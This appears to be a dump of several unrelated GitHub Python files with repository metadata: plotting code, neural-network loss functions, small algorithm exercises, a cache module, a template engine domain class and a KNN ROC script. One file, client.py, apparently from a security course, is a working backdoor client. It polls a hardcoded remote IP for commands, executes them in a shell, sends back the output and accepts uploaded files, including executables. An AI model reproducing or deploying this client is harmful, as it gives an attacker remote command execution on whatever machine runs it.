pdf = PdfPages(filename2)
plotline(x, y, "ASM distribution", label, nsample, legend, filename+".CG")
#plotline(x, y, "CG methylation distribution", label, nsample, legend, filename+".CG")
legend=0
#plotline(x, z, "CHG methylation distribution", label, nsample, legend, filename+".CHG")
#plotline(x, k, "CHH methylation distribution", label, nsample, legend, filename+".CHH")
pdf.savefig()
pdf.close()
'''
fig, ax = plt.subplots()
line1, = ax.plot(x, k1, label='IMR90')
#dashes = [10, 5, 100, 5]
#line1.set_dashes(dashes) # dash line
line2, = ax.plot(x, k2, label='A549')
# several dash line example
#line3, = ax.plot(x, y3, ':', label='..style')
#line4, = ax.plot(x,-np.sin(x)/2, '-.', label='-.style')
#line5, = ax.plot(x,np.sin(x)/4, '--', label='--style')
#line6, = ax.plot(x,-np.sin(x)/4, '^', label='--style')
#plt.axis('off')
#plt.xticks([])
#plt.yticks([])
#ax.axes.get_yaxis().set_visible(False)
# Remove the plot frame lines. They are unnecessary here.
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['right'].set_visible(False)
#ax.spines['left'].set_visible(False)
#ax.axes.get_xaxis().set_visible(False)
plt.legend(loc='center right') # legend , loc is the legend location
plt.axhline(y=0, xmin=0.05, xmax=0.35, linewidth=8, color='gray')
plt.axhline(y=0, xmin=0.65, xmax=0.35, linewidth=8, color='k' )
plt.axhline(y=0, xmin=0.65, xmax=0.95, linewidth=8, color='gray')
scale_ls = [1,39,76,117]
index_ls = ['upstream','Start','End', "downstream"]
plt.xticks(scale_ls,index_ls,color='k', size=15)
#ax.set_title('Box plot')
ax.set_ylabel('Methylation Level',size=15)
maxy=max(k1)
if max(k2) > maxy:
maxy = max(k2)*1.1
else:
maxy = maxy*1.1
ax.set_ylim(0.0, maxy)
#plt.savefig("test.png")
plt.show()
'''
|
ZhouQiangwei/MethHaploScripts
|
plotASM-expressiongene.py
|
plotASM-expressiongene.py
|
py
| 5,901 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24764641791
|
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from .module import Module
from ...autograd import Variable, Backward
class Regression(Module):
'''Base loss function class for Regression task\n
Regression is the task of approximating a mapping function (f) from input variables (x) to a continuous output variable (y).
A continuous output variable is a real-value, such as an integer or floating point value. These are often quantities, such as amounts and sizes.
Args:
live_plot (bool): if True, plot the loss as training of the model proceeds.
'''
def __init__(self, live_plot=False):
self.live_plot = live_plot
self.losses = []
def forward(self, x, t, *args):
raise NotImplementedError
def _prepare_output(self, result, *args):
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
return result
class Classification(Module):
'''Base loss function class for Classification task\n
Classification is the task of approximating a mapping function (f) from input variables (x) to discrete output variables (y).
The output variables are often called labels or categories. The mapping function predicts the class or category for a given observation.
'''
def __init__(self, live_plot=False):
self.live_plot = live_plot
self.losses = []
def forward(self, x, t, *args):
raise NotImplementedError
def to_one_hot(self, x, classes):
'''
Convert labels into one-hot representation
Args:
x (np.array): labels in shape of [N]
classes (int): number of classes to classify
'''
labels = np.zeros((x.size, classes))
for i, label in enumerate(labels):
label[x[i]] = 1
return labels
def get_acc(self, x, t):
if x.shape[1] != 1:
pred = np.argmax(x.data, axis=1).reshape(-1,1)
else:
pred = x.data
if t.shape[1] != 1:
label = np.argmax(t.data, axis=1).reshape(-1,1)
else:
label = t.data
if pred.ndim != 2 or label.ndim != 2:
raise ValueError
return np.sum(pred == label) / x.shape[0]
class MSELoss(Regression):
'''Mean Square Error, Quadratic loss, L2 Loss\n
Creates a criterion that measures the mean squared error between n elements in the input x and target t.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
Shape:
- Input: [N, C]
- Target: [N, C]
- Output: [1] by default
[N] if not reduced
'''
def __init__(self, size_average=True, reduce=True):
super().__init__()
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
        if x.shape != t.data.shape:
            raise ValueError('[*] dimension of input {} and target {} did not match.'.format(x.shape, t.shape))
result = np.sum(np.power(x.data - t.data,2),axis=1)/x.shape[1]
result = self._prepare_output(result, args)
result.set_creator((MSELossBackward(result.shape, x, t)))
return result
class MSELossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return 2*(var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
# TODO
class HuberLoss(Regression):
'''Huber Loss, Smooth Mean Absolute Error\n
Huber loss is a loss function used in robust regression, that is less sensitive to outliers in data than the squared error loss.
Args:
        delta (double): decides the boundary value for the Huber loss calculation. Default: 1
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
Shape:
- Input: [N, C]
- Target: [N, C]
- Output: [1] by default
[N] if not reduced
'''
def __init__(self, delta=1, size_average=True, reduce=True):
super().__init__()
self.delta = delta
self.size_average = size_average
self.reduce = reduce
    def forward(self, x, t, *args):
        if x.shape != t.data.shape:
            raise ValueError('[*] dimension of input and target did not match.')
        a = x.data - t.data
        mask = (np.abs(a) <= self.delta)
        result = np.zeros(a.shape)
        result[mask] = (np.power(a, 2) / 2)[mask]
        result[np.invert(mask)] = (self.delta * (np.abs(a) - self.delta / 2))[np.invert(mask)]
        result = self._prepare_output(result, args)
        result.set_creator((HuberBackward(result.shape, x, t, self.delta, mask)))
        return result
class HuberBackward(Backward):
    def __init__(self, output_shape, var1, target, delta, mask):
        def f(x):
            a = var1.data - target.data
            d = np.zeros(a.shape)
            d[mask] = a[mask]
            d[np.invert(mask)] = (delta * np.abs(a) / (a + 1e-8))[np.invert(mask)]
            return d
        super().__init__(output_shape, var1, f)
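# For reference, the piecewise Huber model implemented above (a = x - t,
# boundary delta):
#     L(a) = a**2 / 2                   if |a| <= delta
#     L(a) = delta * (|a| - delta / 2)  otherwise
# so the gradient is a in the quadratic region and delta * sign(a) in the
# linear region, which HuberBackward approximates as delta * |a| / (a + 1e-8).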
# Classification
class CrossEntropyLoss(Classification):
'''Cross Entropy Loss\n
It is useful when training a classification problem with C classes.
This class incorporates the Softmax layer.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
live_plot (bool):
Shape:
- Input: [N,C] where C = number of classes
- Target: [N] where each value is 0 ≤ targets[i] ≤ C-1 or
[N,C] for one-hot representation
- Output: [1] as default
[N] if reduce is False
Model:
L(p,q) = -sum(p(x)logq(x))
'''
def __init__(self, size_average=True, reduce=True, live_plot=False):
super().__init__(live_plot=live_plot)
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
        if t.ndim == 1:
t.data = self.to_one_hot(t.data, x.shape[1])
if x.shape != t.shape:
            raise ValueError('[*] dimension of input {} and target {} did not match.'.format(x.shape, t.shape))
c = np.max(x.data, axis=1)
c = np.expand_dims(c, axis=1)
tmp = np.exp(x.data - c)
y = tmp / (np.expand_dims(np.sum(tmp, axis=1), axis=1) + 1e-8)
result = np.sum(-t.data * np.log(y), axis=1)
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
result.set_creator((CrossEntropyLossBackward(result.shape, x, t)))
return result
class CrossEntropyLossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return (var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
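# Note on the max-subtraction in CrossEntropyLoss.forward: softmax is shift
# invariant, softmax(x) == softmax(x - c) for any constant c, because
# exp(x_i - c) / sum_j(exp(x_j - c)) == exp(x_i) / sum_j(exp(x_j)); subtracting
# the row-wise max keeps exp() from overflowing on large logits.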
class BCELoss(Classification):
'''Binary Cross Entropy Loss\n
This is used for measuring the error of a reconstruction in for example an auto-encoder.
Note that the targets y should be numbers between 0 and 1.
Args:
size_average (bool): the losses are averaged over observations for each minibatch. However, if False, the losses are instead summed for each minibatch. Ignored if reduce is False.
reduce (bool): the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per batch instead and ignores size_average. Default: True
live_plot (bool):
Shape:
- Input: [N,2]
- Target: [N] where each value is 0 ≤ targets[i] ≤ 1 or
[N,2] for one-hot representation
- Output: [1] as default
[N] if not reduce is True
Model:
L(p,q) = -sum(p(x)logq(x)+(1-p(x))log(1-q(x)))
'''
def __init__(self, size_average=True, reduce=True, live_plot=False):
super().__init__(live_plot=live_plot)
self.size_average = size_average
self.reduce = reduce
def forward(self, x, t, *args):
        if t.ndim == 1:
t.data = self.to_one_hot(t.data, x.shape[1])
if x.shape != t.shape:
            raise ValueError('[*] dimension of input and target did not match.')
c = np.max(x.data, axis=1)
c = np.expand_dims(c, axis=1)
tmp = np.exp(x.data - c)
y = tmp/np.expand_dims(np.sum(tmp, axis=1), axis=1)
result = np.sum(-t.data * np.log(y) - (1 - t.data) * np.log(1 - y), axis=1)
if not 'valid' in args and not 'test' in args:
self.losses.append(np.mean(result))
if self.reduce:
if self.size_average:
result = Variable(np.mean(result))
else:
result = Variable(np.sum(result))
else:
result = Variable(result)
result.set_creator((BCELossBackward(result.shape, x, t)))
return result
class BCELossBackward(Backward):
def __init__(self, output_shape, var1, target):
def f(x):
return (var1.data - target.data)/var1.shape[0]
super().__init__(output_shape, var1, f)
|
Kashu7100/Qualia
|
qualia/nn/modules/loss.py
|
loss.py
|
py
| 10,787 |
python
|
en
|
code
| 3 |
github-code
|
6
|
74348735227
|
# https://www.acmicpc.net/problem/1912
# expected algorithm: DP, sliding window?
# best algorithm: DP
import sys
input = sys.stdin.readline
def solutionInput():
n = int(input().rstrip())
numbers = list(map(int, input().split()))
return n, numbers
def solution(n, numbers):
dp = numbers[0]
answer = numbers[0]
for i in range(1, n):
dp = max(dp+numbers[i], numbers[i])
answer = max(answer, dp)
return answer
print(solution(*solutionInput()))
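# Worked trace (made-up input): for [10, -4, 3, 1, 5, 6, -35, 12, 21, -1] the
# recurrence dp = max(dp + numbers[i], numbers[i]) yields
# 10, 6, 9, 10, 15, 21, -14, 12, 33, 32, so the answer is the max of these: 33.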
|
ksh103/Algorithm-Study-Reboot
|
230102/장예찬_boj_1912_연속합.py
|
장예찬_boj_1912_연속합.py
|
py
| 504 |
python
|
en
|
code
| 0 |
github-code
|
6
|
36609287561
|
import re
message = 'Call me 415-555-2345 tomorrow, or at 415-555-1245.'
phoneNumRegex = re.compile(r'(\d\d\d)-(\d\d\d-\d\d\d\d)')
mo = phoneNumRegex.search(message)
print(mo.group(1))
phoneNumRegex = re.compile(r'\d\d\d-\d\d\d-\d\d\d\d')
moList = phoneNumRegex.findall(message)
print(moList)
batRegex = re.compile(r'bat(man|mobile|bat)')
searchResults = batRegex.search('Batman is the best with a batmobile')
result = searchResults.group()
print(result)
batRegex = re.compile(r'Bat(wo)?man')
searchResults = batRegex.search('The adventures of Batman')
if searchResults != None:
result = searchResults.group()
print(result)
else:
print("No results found.")
searchResults = batRegex.search('The adventures of Batwoman')
if searchResults != None:
result = searchResults.group()
print(result)
else:
print("No results found.")
|
rain15/MyPythonScripts
|
phone.py
|
phone.py
|
py
| 857 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15932153331
|
"""
A simple cache system for storing such things as project hierarchies and templates.
By default uses diskcache for simpler setup and backward compatibility
unless 'memcached' is set in the 'cache' section of the
config, in which case use that.
"""
import logging
from hydra_base import config as hydraconfig
import tempfile
log = logging.getLogger(__name__)
global cache
if hydraconfig.get('cache', 'type') != "memcached":
import diskcache as dc
cache = dc.Cache(tempfile.gettempdir())
elif hydraconfig.get('cache', 'type') == 'memcached':
try:
import pylibmc
cache = pylibmc.Client([hydraconfig.get('cache', 'host', '127.0.0.1')], binary=True)
except ModuleNotFoundError:
log.warning("Unable to find pylibmc. Defaulting to diskcache.")
import diskcache as dc
cache = dc.Cache(tempfile.gettempdir())
def clear_cache():
if hasattr(cache, 'flush_all'):
cache.flush_all() # memcache
else:
cache.clear() # diskcache
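# A minimal usage sketch (hypothetical key/value, hypothetical helper name):
# both backends selected above expose set()/get(), so callers can stay
# backend-agnostic.
def cache_example():
    cache.set('greeting', 'hello')  # works for diskcache and pylibmc alike
    return cache.get('greeting')    # -> 'hello'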
|
hydraplatform/hydra-base
|
hydra_base/lib/cache.py
|
cache.py
|
py
| 1,015 |
python
|
en
|
code
| 8 |
github-code
|
6
|
35611313706
|
"""
In this we write an Algorithm for Linear search
"""
# Linear Search:
"""
Linear Search is a algorithm in which we find a given number is present in the array at which index
Example:
array = [1,2 3, 4]
# Number which we need to find at which index: 4
output:3
Because 4 its present at 3rd index
"""
# size of Array
size_of_array = int(input())
# number that needs to be found
number_find = int(input())
# creating an Array
array = [int(i) for i in input().split(' ')]
# Solution: without using a function
"""
Step-1: We iterate over every element of the array
Step-2: We compare every element with the given number
Step-3: If we find the element we record its index; otherwise the index stays -1
"""
index_number = -1
# iterating on an array
for i in range(size_of_array):
if array[i] == number_find:
index_number = i
# printing a final result
print("index number {} without function solution".format(index_number))
# Solution: with using function
def linear_search(array_with_func_para: list, find_number_with_func: int, size_of_array_with_func_para: int):
    """
    this function performs a linear search
    :param array_with_func_para: array
    :param find_number_with_func: number that needs to be found in the array
    :param size_of_array_with_func_para: size of the array
    :return: the index of the number if found, otherwise -1
    """
    for i in range(size_of_array_with_func_para):
        # comparing every element with the number to find
        if array_with_func_para[i] == find_number_with_func:
            # if the condition is True, we found it; return that index
            return i  # i means index
    # if the number is not in the array, return -1
    return -1
# calling function
index_number = linear_search(array, number_find, size_of_array)
print("index number {} using function solution".format(index_number))
|
MDTalha178/Python_DSA
|
Array/linear_serach.py
|
linear_serach.py
|
py
| 1,892 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44669737946
|
# https://docs.python.org/3/library/socket.html#socket.SOCK_DGRAM
# used this to learn how to initialize socket.
import ipaddress
# https://www.securecoding.com/blog/how-to-build-a-simple-backdoor-in-python/
# This file itself is an iteration on the client described here.
import socket
import subprocess
import sys
import commands
from commands import Commands
udp_buffer_size = 4096
tcp_buffer_size = 4096
def get_command(request, sock, host, port):
while True:
try:
sock.sendto(commands.to_byte(request), (host, port))
return sock.recv(udp_buffer_size).decode()
except TimeoutError:
print("Timed out, sending new request")
# https://contenttool.io/text-difference-checker
# used this tool to confirm that the read and write functions worked.
def write_list_into_file(name, byte_or_char_type, input_list):
write_target = open(name, 'w{0}'.format(byte_or_char_type))
for current_string in input_list:
write_target.write(current_string)
write_target.close()
DEFAULT_HOST = '172.113.155.186'
DEFAULT_PORT = 4444
DEFAULT_TRANSFER_PORT = 4450
REMOTE_HOST = DEFAULT_HOST
REMOTE_PORT = DEFAULT_PORT
REMOTE_TRANSFER_PORT = DEFAULT_TRANSFER_PORT
if len(sys.argv) > 1:
REMOTE_HOST = sys.argv[1]
if len(sys.argv) > 2:
REMOTE_PORT = int(sys.argv[2])
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
try:
while True:
print("[-] Requesting command...")
command = get_command(Commands.REQUEST, s, REMOTE_HOST, REMOTE_PORT)
if command == 'file':
f = None
tcp_connection = socket.socket()
print("Waiting on file name connection.")
file_name = get_command(Commands.FILENAME, s, REMOTE_HOST, REMOTE_PORT)
            is_exe = ".exe" in file_name
try:
tcp_connection.connect((REMOTE_HOST, REMOTE_TRANSFER_PORT))
f = open(file_name, 'ab' if is_exe else 'a')
current_input = tcp_connection.recv(tcp_buffer_size)
current_input = current_input.decode() if not is_exe else current_input
counter = 0
while commands.str_to_command(current_input) != Commands.END_TRANSFER:
counter += 1
f.write(current_input)
tcp_connection.send(commands.to_byte(Commands.FILE))
current_input = tcp_connection.recv(tcp_buffer_size)
current_input = current_input.decode() if not is_exe else current_input
print(counter)
            finally:
                tcp_connection.close()
                if f is not None:
                    f.close()
s.sendto(b'Finished file transfer.', (REMOTE_HOST, REMOTE_PORT))
elif command is not None:
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = op.stdout.read()
output_error = op.stderr.read()
print("[-] Sending response...")
s.sendto(output + output_error, (REMOTE_HOST, REMOTE_PORT))
except ConnectionAbortedError:
print("Connection severed")
except ConnectionResetError:
print("Connection reset")
finally:
s.close()
|
gavinlampton/CECS378_Group6_Project
|
client.py
|
client.py
|
py
| 3,358 |
python
|
en
|
code
| 0 |
github-code
|
6
|
3083968092
|
import ball_reader
import csv
from StackedESN import StackedESN
import matplotlib.pyplot as plt
import numpy as np
import os
def train_tracker(ball_data_folder, plot_path, networks_count, n_reservoir,
train_cycles=20, test_cycles=10,
alpha=0.8, resSize=100, plot_show=True):
plot_name='tracker'
if not os.path.exists(plot_path+"networks"):
os.makedirs(plot_path+"networks")
#number of time steps
total_n = train_cycles+test_cycles
# Get Data
#return nx2x4x4 pixel color data
# x, y
# switched or not
input_size, output_size1, output_size2, pix_data, output1, output2 = ball_reader.getDataSwitchBalls(ball_data_folder, train_cycles+test_cycles)
# reshape the data to remove dimensions
input_data = pix_data.reshape((total_n,input_size))
data_train, y1_train, y2_train = input_data[:train_cycles], output1[:train_cycles], output2[:train_cycles]
data_test, y1_test, y2_test = input_data[train_cycles:], output1[train_cycles:], output2[train_cycles:]
#save input data
header = "x0,y0"
np.savetxt(plot_path + "input.csv", y1_test, delimiter=",", header=header, fmt='%3f', comments='')
for i in range(networks_count):
esn = StackedESN(n_input=input_size, n_output1=output_size1, n_output2=output_size2, n_reservoir=n_reservoir, leakingRate=0.2, spectralRadius=0.9, regressionParameters=[1e-2])
esn.fit(inputData=data_train, outputData1=y1_train, outputData2=y2_train, transientTime=0, verbose=1)
y1_test_pred, y2_test_pred = esn.predict(inputData=data_test, outputData1=y1_test, outputData2=y2_test, verbose=1) #continuation can be set to false
np.savetxt(plot_path + "track_" + str(i) + ".csv", y1_test_pred, delimiter=",", header=header, fmt='%3f', comments='')
#save network
esn.save(path=plot_path + "networks/" + str(i))
# Prediction Plot
plt.figure('Coordinates Estimation', figsize=(14,7)).clear()
plt.plot(y1_test[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y1_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label='Estimation')
plt.legend()
figname = plot_path + plot_name + "_tracking_" + str(i) + ".png"
plt.savefig(figname)
print('\t[+]Plot saved in', figname)
#if plot_show:
# plt.show()
plt.figure('Switch Estimation', figsize=(14,7)).clear()
#plt.yscale('log')
plt.plot(y2_test[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y2_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label='Estimation')
plt.legend()
figname = plot_path + plot_name + "_switch_" + str(i) + ".png"
plt.savefig(figname)
print('\t[+]Plot saved in', figname)
#if plot_show:
# plt.show()
def evaluate_tracker(plot_path, ball_data_folder, esn_path, steps, offset):
plot_name='tracker'
esn = StackedESN.load(esn_path)
input_size, output_size1, output_size2, pix_data, output1, output2 = ball_reader.getDataChangeBall(ball_data_folder, steps, offset=offset)
# reshape the data to remove dimensions
input_data = pix_data.reshape((steps,input_size))
dummy_switch_info = np.zeros((output2.shape))
y_test_pred, _ = esn.predict(inputData=input_data, outputData1=output1, outputData2=dummy_switch_info, verbose=1, continuation=False)
plt.figure('Change Estimation', figsize=(14,7)).clear()
plt.plot(output1[:,0], color='red', linewidth=5, label='Target Value')
plt.plot(y_test_pred[:,0], color='blue', linestyle="--", linewidth=1, label="Estimation")
plt.plot(output2[:,0]*100, color='black', linewidth=2, label="Ball color")
plt.legend()
figname = plot_path + plot_name + "_change.png"
plt.savefig(figname)
#save in csv file
header = "x0,y0"
np.savetxt(plot_path + "evaluation_data.csv", output1, delimiter=",", header=header, fmt='%3f', comments='')
header = "x0,y0"
np.savetxt(plot_path + "evaluated_data.csv", y_test_pred, delimiter=",", header=header, fmt='%3f', comments='')
plt.show()
if __name__=='__main__':
ball_data_folder = "../data/switch_balls/" #"../data/changing_ball/"
data_path = 'cb_results/switch_balls/'
main_balls_count = 2
train_cycles = 800
test_cycles = 200
n_reservoir = 50
#train_tracker(ball_data_folder=ball_data_folder, plot_path=data_path, networks_count=1, train_cycles = train_cycles, test_cycles=test_cycles, n_reservoir=n_reservoir)
evaluate_tracker(plot_path=data_path, ball_data_folder="../data/changing_ball/", esn_path=data_path+"networks/0", steps=500, offset=0)
|
ksk-S/DynamicChangeBlindness
|
workspace_models/echo_state_network/switch_tracker.py
|
switch_tracker.py
|
py
| 4,370 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21188550409
|
from math import sqrt
from typing import List


class Solution:
    def kClosest(self, points: List[List[int]], k: int) -> List[List[int]]:
        dist = []
        for i in range(len(points)):
            # distance to the origin: sqrt(x^2 + y^2), paired with the point
            dist.append([sqrt(points[i][0] ** 2 + points[i][1] ** 2), points[i]])
        dist.sort()  # ascending, so the nearest points come first
        out = []
        for i in range(k):  # collect the k nearest points
            out.append(dist[i][1])
        return out
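# A minimal alternative sketch (not from the original solution): heapq.nsmallest
# avoids a full sort when k << len(points), and the squared distance orders the
# points the same way as the true distance, so sqrt can be skipped.
import heapq

def k_closest_heap(points: List[List[int]], k: int) -> List[List[int]]:
    # keep the k points with the smallest squared distance to the origin
    return heapq.nsmallest(k, points, key=lambda p: p[0] ** 2 + p[1] ** 2)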
|
AhmedMaherTohmay/IEEE-ZSB-Technica1-Rookies-23
|
task7/p3.py
|
p3.py
|
py
| 562 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10294260342
|
__url__ = "$URL: svn://gizmojo.org/pub/evoque/trunk/domain.py $"
__revision__ = "$Id: domain.py 1153 2009-01-20 11:43:21Z mario $"
import sys, logging
from evoque.collection import Collection
from evoque.evaluator import set_namespace_on_dict, xml
def get_log():
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s")
return logging.getLogger("evoque")
# $begin{init}
class Domain(object):
""" A registry of collections """
def __init__(self, default_dir,
restricted=False, errors=3, log=get_log(),
# defaults for Collections
cache_size=0, auto_reload=60, slurpy_directives=True,
# defaults for Collections (and Templates)
quoting="xml", input_encoding="utf_8", filters=[]):
"""
default_dir: either(str, Collection)
abs path, or actual default collection instance
restricted: bool
restricted evaluation namespace
errors: int
["silent", "zero", "name", "render", "raise"]
log: the logging.getLogger("evoque") logger; may be pre-initialized
and passed in, or adjusted as needed after initialization.
            Default settings (via logging.basicConfig()) are:
handler=StreamHandler()
level=logging.INFO
format="%(asctime)s %(levelname)-5.5s [%(name)s] %(message)s"
# Defaults for Collections (and Templates)
cache_size: int
max number loaded templates in collection
0 means unlimited loaded templates
auto_reload: int
min seconds to wait to check if needs reloading
0 means check on every rendering
slurpy_directives: bool
consume all whitespace trailing a directive
quoting: either("xml", "str", type)
"xml" -> qpy.xml, "str" -> unicode
input_encoding: str
hint for how to decode template source
filters: [callable]
list of template post-evaluation filter functions
"""
# $end{init}
self.restricted = restricted
self.errors = errors
self.log = log # the logging.getLogger("evoque") logger
# defaults -- cascaded down to collections
self.cache_size = cache_size
self.auto_reload = auto_reload
self.slurpy_directives = slurpy_directives
self.quoting = quoting
self.input_encoding = input_encoding
self.filters = filters
#
self.collections = {} # by collection name
# default collection
if isinstance(default_dir, Collection):
self.collections[default_dir.name] = default_dir
self.default_collection = default_dir
else:
self.set_collection("", default_dir, cache_size, auto_reload,
slurpy_directives, quoting, input_encoding, filters)
self.default_collection = self.collections[""]
#
self.globals = {}
self.globals['xml'] = xml
if self.restricted:
restrict_execution_namespace(self.globals)
def set_on_globals(self, name, value):
""" (name:str, value:any) -> None
"""
self.globals[name] = value
def set_namespace_on_globals(self, name, obj, no_underscored=True):
""" (name:either(str, None), obj:any, no_underscored:bool) -> None
If name is None, the obj's namespace will be set onto top-level.
"""
set_namespace_on_dict(self.globals, name, obj, no_underscored)
def get_collection(self, name=None):
""" (name:either(None, str, Collection)) -> Collection
"""
if name is None:
return self.default_collection
if isinstance(name, Collection):
name = name.name
return self.collections[name]
def set_collection(self, name, dir,
cache_size=None, auto_reload=None, slurpy_directives=None,
quoting=None, input_encoding=None, filters=None):
""" (name:str, dir:str,
cache_size:int, auto_reload:int, slurpy_directives:bool,
quoting:either(str, type), input_encoding:str,
filters:either(None, [callable])) -> None
"""
if self.has_collection(name):
raise ValueError(
"Domain already has a collection named [%s]" % (name))
self.collections[name] = Collection(self, name, dir,
cache_size, auto_reload, slurpy_directives, quoting,
input_encoding, filters)
def has_collection(self, name):
""" (name:str -> bool
"""
return name in self.collections
def get_template(self, name, src=None, collection=None, raw=None,
data=None, quoting=None, input_encoding=None, filters=None):
""" Wraps Collection.get_template()
"""
return self.get_collection(collection).get_template(name,
src, raw, data, quoting, input_encoding, filters)
def set_template(self, name, src=None, collection=None, raw=None,
data=None, from_string=True,
quoting=None, input_encoding=None, filters=None):
""" Wraps Collection.set_template()
"""
self.get_collection(collection).set_template(name, src,
raw, data, from_string, quoting, input_encoding, filters)
def has_template(self, name, collection=None):
""" Wraps Collection.has_template()
"""
return self.get_collection(collection).has_template(name)
def restrict_execution_namespace(namespace):
""" (namespace:dict) -> None
Modifies the namespace dict parameter to add entries for builtins deemed
safe, and sets a dummy __builtins__ empty dict.
"""
# here type(__builtins__) is dict (not module as in the interpreter)
import inspect
    # In python 2.4, BaseException is not available
BaseException_ = __builtins__.get('BaseException', Exception)
for name, obj in __builtins__.items():
if name in DISALLOW_BUILTINS:
continue
if inspect.isbuiltin(obj) or \
(inspect.isclass(obj) and not issubclass(obj, BaseException_)) or \
(obj in (None, True, False)):
namespace[name] = obj
namespace["__builtins__"] = {}
# Potentially unsafe __builtins__ in python 2.5 that will be removed from
# execution namespace (in addition to all subclasses of BaseException).
# $begin{unsafe}
DISALLOW_BUILTINS = ["_", "__debug__", "__doc__", "__import__", "__name__",
"buffer", "callable", "classmethod", "coerce", "compile", "delattr", "dir",
"eval", "execfile", "exit", "file", "getattr", "globals", "hasattr", "id",
"input", "isinstance", "issubclass", "locals", "object", "open", "quit",
"raw_input", "reload", "setattr", "staticmethod", "super", "type", "vars"]
# $end{unsafe}
# why "object" is included, see:
# http://groups.google.com/group/comp.lang.python/msg/5639e1b5cdac3ac2
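# Hypothetical usage sketch (path illustrative; only methods defined in this
# module are exercised):
#
#   from evoque.domain import Domain
#   domain = Domain("/path/to/templates", restricted=True)
#   domain.set_template("hello", src="Hello, ${name}!", from_string=True)
#   assert domain.has_template("hello")
#   t = domain.get_template("hello")  # render via t.evoque(...) per the Evoque docs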
|
phonybone/Rnaseq
|
ext_libs/evoque/domain.py
|
domain.py
|
py
| 7,129 |
python
|
en
|
code
| 3 |
github-code
|
6
|
45180348436
|
# Decide whether a video belongs to the humor category or the practical category
import numpy as np
import operator
from matplotlib import pyplot as plt
def traindataset():
    datagroup=np.loadtxt('C:\\Users\\Dell\\Desktop\\classification\\diabetes_train.txt',dtype=float,delimiter=',')
dataset=datagroup[:,1:]
label=datagroup[:,0]
return dataset,label
def testdataset():
    datagroup=np.loadtxt('C:\\Users\\Dell\\Desktop\\classification\\diabetes_test.txt',dtype=float,delimiter=',')
dataset=datagroup[:,1:]
label=datagroup[:,0]
return dataset,label
def K_classify(test,datagroup,label,k,p):  # p = decision threshold
    datasize=datagroup.shape[0]  # number of rows in the training data
    test0=np.tile(test,(datasize,1))-datagroup  # broadcast the test sample to the training shape, then subtract
    distance0=(test0**2).sum(1)  # sum of squares
    distance=distance0**0.5  # square root gives the Euclidean distance
    listsy=distance0.argsort()  # indices by ascending distance (squared distances sort identically)
    classcount={}  # empty dict for per-class counts
num0=0
num1=0
for i in range(k):
label0=label[listsy[i]]
        classcount[label0]=classcount.get(label0,0)+1  # count occurrences of each class
if label0==0:
num0+=1
else:
num1+=1
nums=num0+num1
if num1/nums >= p:
return 1
else:
return 0
if __name__=='__main__':
datagroup,label=traindataset()
test,truelabels=testdataset()
predict=[]
    Ps=[(n/100) for n in range(101)]  # sweep the threshold from 0 to 1
a=-1
b=0
AUC=0.0
TPR=[]
FPR=[]
for p in Ps:
for i in range(len(test)):
predict.append(K_classify(test[i],datagroup,label,150,p))
tp=0
fp=0
tn=0
fn=0
for j in range(len(test)):
if predict[j]==truelabels[j]:
if predict[j]==1:
tp+=1
else:
tn+=1
else:
if predict[j]==1:
fp+=1
else:
fn+=1
fpr=fp/(fp+tn)
tpr=tp/(tp+fn)
print(fpr)
        AUC+=(a+tpr)*(b-fpr)/2  # trapezoidal rule: accumulate the ROC area piece by piece
a=tpr
b=fpr
TPR.append(tpr)
FPR.append(fpr)
del predict[:]
plt.plot(FPR,TPR)
plt.xlabel('FPR')
plt.ylabel('TPR')
    plt.title('ROC Curve')
    plt.rcParams['font.sans-serif'] = ['SimHei']  # font that can render Chinese labels
    plt.grid()  # grid lines
x=[(n/10) for n in range(11)]
y=[(n/10) for n in range(11)]
plt.xticks(x)
plt.yticks(y)
print('AUC=',AUC)
plt.show()
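    # Cross-check sketch for the trapezoid accumulation above (assumes the
    # FPR/TPR lists gathered during the sweep; np.trapz integrates y over x):
    #
    #   order = np.argsort(FPR)
    #   auc_check = np.trapz(np.array(TPR)[order], np.array(FPR)[order])
    #   print('AUC (np.trapz) =', auc_check)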
|
lijiaming666/Python_demo
|
K近邻法+ROC.py
|
K近邻法+ROC.py
|
py
| 2,540 |
python
|
zh
|
code
| 0 |
github-code
